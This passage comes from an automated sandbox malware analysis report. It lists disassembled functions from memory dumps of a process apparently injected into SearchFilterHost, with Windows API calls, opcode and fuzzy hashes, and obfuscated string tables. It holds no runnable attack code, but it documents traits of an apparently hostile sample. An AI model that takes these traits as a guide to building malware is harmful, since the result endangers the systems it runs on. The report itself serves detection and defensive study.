                                                                                                  • Instruction Fuzzy Hash: 2201C4B6210208BBCB04DE89DC80EEB77BDAF8C754F408108FA09D7240D630F8518BA4
                                                                                                  Function 03299B60 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03299BA5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_3290000_SearchFilterHost.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2422867632-0
                                                                                                  • Opcode ID: 7c9241d74bd5b347f5f07e7d64a9624fab22b1b1dc3d216eaf8aed92d631286b
                                                                                                  • Instruction ID: f455c1b20532c7846d1dc0ecec8b02c4fdfbf7c32d9c3a38fd43fcd1cdf555a8
                                                                                                  • Opcode Fuzzy Hash: 7c9241d74bd5b347f5f07e7d64a9624fab22b1b1dc3d216eaf8aed92d631286b
                                                                                                  • Instruction Fuzzy Hash: 77F0653735031476E720A1A99C02FD7B35C8B84BA1F14042AF70CEB1C0D595B48142E5
                                                                                                  Function 03299B5B Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03299BA5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_3290000_SearchFilterHost.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2422867632-0
                                                                                                  • Opcode ID: bcb19224aaeec15361a6d8bef94220f807efac4f452d77956223e96c51700ec1
                                                                                                  • Instruction ID: ae1efb30f669d52c79f4131b3689cb568fa09aff4776a9cdebb2661e770fd246
                                                                                                  • Opcode Fuzzy Hash: bcb19224aaeec15361a6d8bef94220f807efac4f452d77956223e96c51700ec1
                                                                                                  • Instruction Fuzzy Hash: 07E0923729030476F731B5A99C03FE7669C8F94B90F24052AF708FF2C4D5A5B88182A4
                                                                                                  Function 032B9530 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • RtlAllocateHeap.NTDLL(032A17E9,?,032B5E28,032A17E9,032B551E,032B5E28,?,032A17E9,032B551E,00001000,?,?,00000000), ref: 032B956F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_3290000_SearchFilterHost.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1279760036-0
                                                                                                  • Opcode ID: 0681289463acc3cc7b52d519a9f1f540006482d51675ae265bd9054e089dee02
                                                                                                  • Instruction ID: ee999836de3710bbfb95a39b6abd0f44def025dbbcf3e2d173674d4d3f304477
                                                                                                  • Opcode Fuzzy Hash: 0681289463acc3cc7b52d519a9f1f540006482d51675ae265bd9054e089dee02
                                                                                                  • Instruction Fuzzy Hash: 10E06576200309BFDA14EE69DC40FAB37ACEFC9710F008019F918AB282D670B9108AB4
                                                                                                  Function 032B9580 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,46B60F1A,00000007,00000000,00000004,00000000,032A3BBD,000000F4), ref: 032B95BC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_3290000_SearchFilterHost.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FreeHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 3298025750-0
                                                                                                  • Opcode ID: 531c6c2c2d8dd0a598f6d651127fe8afacc0e6ecc84a87ed1681958ec2130ae6
                                                                                                  • Instruction ID: 83693d722035fd543230f7d62d5adcc0bd4f14634b7b27ba222d22020a638f0e
                                                                                                  • Opcode Fuzzy Hash: 531c6c2c2d8dd0a598f6d651127fe8afacc0e6ecc84a87ed1681958ec2130ae6
                                                                                                  • Instruction Fuzzy Hash: 93E065B6600308BBDA10EE59DC45EDB33ACEFC8710F004409FA1CAB241D6B0B9118AB4
                                                                                                  Function 032A8170 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 032A819C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_3290000_SearchFilterHost.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AttributesFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 3188754299-0
                                                                                                  • Opcode ID: 806c54c6b215c547bcfb9bfa05eecf21207386e71b03b5ba7d4a58b437e02490
                                                                                                  • Instruction ID: bc37179d322a3c2dd551ae958a6b666c05849da2e4e4d550febf6593e2533def
                                                                                                  • Opcode Fuzzy Hash: 806c54c6b215c547bcfb9bfa05eecf21207386e71b03b5ba7d4a58b437e02490
                                                                                                  • Instruction Fuzzy Hash: 09E0867526070827FB28FAACDC46FA6735C9B88F64F1C4660F91CDB2C1E578F5918160
                                                                                                  Function 032A8169 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 032A819C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_3290000_SearchFilterHost.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AttributesFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 3188754299-0
                                                                                                  • Opcode ID: d785032f748d27a6c0213acb01bf1e209cbf5d0502e61f246228a76359ae6f26
                                                                                                  • Instruction ID: c1ac5a288864933a611516741c97a7e639b6e8bac2e27480bfaeadea68f08a22
                                                                                                  • Opcode Fuzzy Hash: d785032f748d27a6c0213acb01bf1e209cbf5d0502e61f246228a76359ae6f26
                                                                                                  • Instruction Fuzzy Hash: D8E0DF7122070427F728AA6CCC42FA6B3289B48F24F080614F9589F2C1D274F68282A0
                                                                                                  Function 032A7F60 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SetErrorMode.KERNELBASE(00008003,?,?,032A1AF0,032B7E5F,032B551E,032A1AB3), ref: 032A7F93
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_3290000_SearchFilterHost.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorMode
                                                                                                  • String ID:
                                                                                                  • API String ID: 2340568224-0
                                                                                                  • Opcode ID: 0b2f1d144485d69762a00fbafa5982216ccf80427bc6ec807218d350fbbf8af2
                                                                                                  • Instruction ID: 0d70e323640bb2e76329f049d00ef1f16b6d1c18f864fa6927bf35fdcb98bf18
                                                                                                  • Opcode Fuzzy Hash: 0b2f1d144485d69762a00fbafa5982216ccf80427bc6ec807218d350fbbf8af2
                                                                                                  • Instruction Fuzzy Hash: 12D05E752543057BFA08E6E98C02FA6328C4B14B94F084064FA0CEF2C1EAA5F15041A9
                                                                                                  Function 032A0C6B Relevance: 1.5, APIs: 1, Instructions: 21threadwindowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(?,00000111), ref: 032A0C77
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_3290000_SearchFilterHost.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: MessagePostThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 1836367815-0
                                                                                                  • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                                  • Instruction ID: f770990833f3b09c99676d0933970882f6193e103fc4b2e77b798ec48c7dc6f9
                                                                                                  • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                                  • Instruction Fuzzy Hash: A7D0A76770000C36A60145846CC1CFEB71CDB84AA5F004063FB08D1040D52149060AB0
                                                                                                  Function 051B2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 1ab6d12772012fac7321b8e92ba8230923eebcc435bfd475672cf632edf7da0b
                                                                                                  • Instruction ID: 67eed08b923df4779b18152135e54e08068e81501604ac8db47d38f67d636e83
                                                                                                  • Opcode Fuzzy Hash: 1ab6d12772012fac7321b8e92ba8230923eebcc435bfd475672cf632edf7da0b
                                                                                                  • Instruction Fuzzy Hash: A3B02B328014C0C5EA00E3200708B173E0077D0301F25C061D2030241E033DC0C0E171

                                                                                                  Non-executed Functions

                                                                                                  Function 054904E8 Relevance: .2, Instructions: 165COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2978302177.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5490000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 599cea3c89aa8d2d00db45a7226a69b9c32bcd7ef6b978220a5f73becd738535
                                                                                                  • Instruction ID: 2463e91998e8db3b936508e891380294f0d9516ed9bfcdb4c9d3267edafd5f0b
                                                                                                  • Opcode Fuzzy Hash: 599cea3c89aa8d2d00db45a7226a69b9c32bcd7ef6b978220a5f73becd738535
                                                                                                  • Instruction Fuzzy Hash: 6A41177160CF099FDB1CEF69D04A6B6BBE2FB88310F50012ED45AC3252EB70D852C685
                                                                                                  Function 0549DFA9 Relevance: 56.5, Strings: 45, Instructions: 215COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2978302177.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5490000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                  • API String ID: 0-3558027158
                                                                                                  • Opcode ID: 58f1b9927b824bb9dcbb1c0a0cfe485ef1dd7800f26eee487fca1b4fb5f43272
                                                                                                  • Instruction ID: 461b18bb2b312125e28a220a4d60b4b903e29800d83afd7396f2103967ab62bc
                                                                                                  • Opcode Fuzzy Hash: 58f1b9927b824bb9dcbb1c0a0cfe485ef1dd7800f26eee487fca1b4fb5f43272
                                                                                                  • Instruction Fuzzy Hash: 0B9151F04082948AC7198F55A0652AFFFB5EBC6305F15816DE7E6BB243C3BE8905CB85
                                                                                                  Function 05493B19 Relevance: 36.3, Strings: 29, Instructions: 64COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2978302177.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5490000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: (-<v$(osj$(tn`$+fww$+njf$4<v:$7)0$:7)?$<q:e$>+nj$`b(p$b(fw$bew+$f`b($fi`b$fqna$fsnh$fwwk$i`+-$ibc*$k+fw$kndf$ndfs$nhi($njf`$sjk,$snhi$v:7)$wknd
                                                                                                  • API String ID: 0-1767049587
                                                                                                  • Opcode ID: dd6d7aa567c62fa328c63063d67ba3e3b5c52637044f130e98b2f9125e5cec33
                                                                                                  • Instruction ID: d5a0fc91ad2eb093ab52229b639970a1b157ee3fff2bad1f88ee6a4509ea6c3f
                                                                                                  • Opcode Fuzzy Hash: dd6d7aa567c62fa328c63063d67ba3e3b5c52637044f130e98b2f9125e5cec33
                                                                                                  • Instruction Fuzzy Hash: BE3134B085874DDBCF18DF81E685BDDBB71FF14748F809159E808AA388D7748A25CB89
                                                                                                  Function 051B2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ___swprintf_l
                                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                  • API String ID: 48624451-2108815105
                                                                                                  • Opcode ID: 466ab2cc2cc48473aa814a108dfb13ec414196992bdb2a2632d89df80ca2bad6
                                                                                                  • Instruction ID: d317fdf0da1078f1faf9d9552dc6d64e57b34a6715c848eee411c01dfc1df35c
                                                                                                  • Opcode Fuzzy Hash: 466ab2cc2cc48473aa814a108dfb13ec414196992bdb2a2632d89df80ca2bad6
                                                                                                  • Instruction Fuzzy Hash: 7F5128B5F04126BFDB20DB9888949BEFBF9BF08200B508169E479D7641D374DE548BE0
                                                                                                  Function 05222410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ___swprintf_l
                                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                  • API String ID: 48624451-2108815105
                                                                                                  • Opcode ID: 005a745a8f45edf8deb8dae369e7bc9eda95163a67af5907559302b65f3f8f73
                                                                                                  • Instruction ID: 61b898c81342ceb03afce8628be51d7acf8e00a455cb82cacd673ee47347abab
                                                                                                  • Opcode Fuzzy Hash: 005a745a8f45edf8deb8dae369e7bc9eda95163a67af5907559302b65f3f8f73
                                                                                                  • Instruction Fuzzy Hash: E751F57DA10666FBCB24DE9CC89087FB7BAAF48200B44C85DE49AD7641D7B5DA40C760
                                                                                                  Function 05493C60 Relevance: 15.1, Strings: 12, Instructions: 59COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2978302177.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5490000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: !9=+$'"+$+ c;$+<<7$<av`$=unw$`~`{$`~`~$w~~a$}|un$~`{}$~`~n
                                                                                                  • API String ID: 0-2347180261
                                                                                                  • Opcode ID: de04b04882d813d290c23b670bf3701741976dd55250ee44222292c97ea1c8e7
                                                                                                  • Instruction ID: fc03e473cbec90013e93471983bb57afb8c2fa6d33d1773000a93e31137654ed
                                                                                                  • Opcode Fuzzy Hash: de04b04882d813d290c23b670bf3701741976dd55250ee44222292c97ea1c8e7
                                                                                                  • Instruction Fuzzy Hash: 932148B041070DDFCF14AF80D581AEE7B71FB14384F505019E90A6F269CB768B55CB89
                                                                                                  Function 051A7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 051E4725
                                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 051E46FC
                                                                                                  • Execute=1, xrefs: 051E4713
                                                                                                  • ExecuteOptions, xrefs: 051E46A0
                                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 051E4787
                                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 051E4655
                                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 051E4742
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                  • API String ID: 0-484625025
                                                                                                  • Opcode ID: c4b440a1b2492a58175103d7fe922543e59f795227f4e7b83432c0eef0f88411
                                                                                                  • Instruction ID: 0a8d61ec9872bdc6e617a56f1fbfbcf44d67f672dc356efefefd1a7bf01a577d
                                                                                                  • Opcode Fuzzy Hash: c4b440a1b2492a58175103d7fe922543e59f795227f4e7b83432c0eef0f88411
                                                                                                  • Instruction Fuzzy Hash: 2051F836B402197AEF22EBA4DC5DFF977A9EF44310F040099D60AA71C1DBB19B45CB50
                                                                                                  Function 05246940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                  • Instruction ID: c10460a19607c28f19a61c2fdf40f4214ea803c643f6f30efe02db37e22fa4fc
                                                                                                  • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                  • Instruction Fuzzy Hash: F6021271618341AFD309CF18C494A6ABBE5FF89700F048A2DF99A9B264DB71E905CF52
                                                                                                  Function 051BB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __aulldvrm
                                                                                                  • String ID: +$-$0$0
                                                                                                  • API String ID: 1302938615-699404926
                                                                                                  • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                  • Instruction ID: 4b5820e8c2413706bc22acd5ec67da83fa0ddf7828e10866ed7f15d64f6272b0
                                                                                                  • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                  • Instruction Fuzzy Hash: 1681A170E0D2499FFF28DE69C891BFEBBA2BF45310F184159D892A7AD1C7B49840C750
                                                                                                  Function 052220E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ___swprintf_l
                                                                                                  • String ID: %%%u$[$]:%u
                                                                                                  • API String ID: 48624451-2819853543
                                                                                                  • Opcode ID: 59b0ef533a184782d6e1c71c3d2c74073a05d800b1f10102fbefe2db6ce690a2
                                                                                                  • Instruction ID: 5f40e8e7e506aaff18ff2beac1305a96e33fa5fadc800b0129935c33ad5a98ca
                                                                                                  • Opcode Fuzzy Hash: 59b0ef533a184782d6e1c71c3d2c74073a05d800b1f10102fbefe2db6ce690a2
                                                                                                  • Instruction Fuzzy Hash: 3721537AA10129EBDB10DE69DC44EFEBBE9AF54640F040116E915E3201EB7199118BA1
                                                                                                  Function 0519F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 051E02BD
                                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 051E02E7
                                                                                                  • RTL: Re-Waiting, xrefs: 051E031E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                  • API String ID: 0-2474120054
                                                                                                  • Opcode ID: bbad7af89f60d3eeb2a00dc886492b2b881e8610c7842e7899ec380964fc3379
                                                                                                  • Instruction ID: ac4b3e139ac6b08220e17c5520bab2e5362f5d3b984cccf9e71c94f49d2d686d
                                                                                                  • Opcode Fuzzy Hash: bbad7af89f60d3eeb2a00dc886492b2b881e8610c7842e7899ec380964fc3379
                                                                                                  • Instruction Fuzzy Hash: 1EE1B234608741AFDB29DF28C888B6AB7E1BF88714F140A1DF5A6CB2D1D7B4D945CB42
                                                                                                  Function 051ABED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • RTL: Resource at %p, xrefs: 051E7B8E
                                                                                                  • RTL: Re-Waiting, xrefs: 051E7BAC
                                                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 051E7B7F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                  • API String ID: 0-871070163
                                                                                                  • Opcode ID: 317c498e481fb2586b7f27405b7ebd1979d71d9e0a8869e55565adf960ecae52
                                                                                                  • Instruction ID: 110107c3ab01009a30fb74e6085c53e02b1a6b1dea88f0f6e29e8e9e55eb8f17
                                                                                                  • Opcode Fuzzy Hash: 317c498e481fb2586b7f27405b7ebd1979d71d9e0a8869e55565adf960ecae52
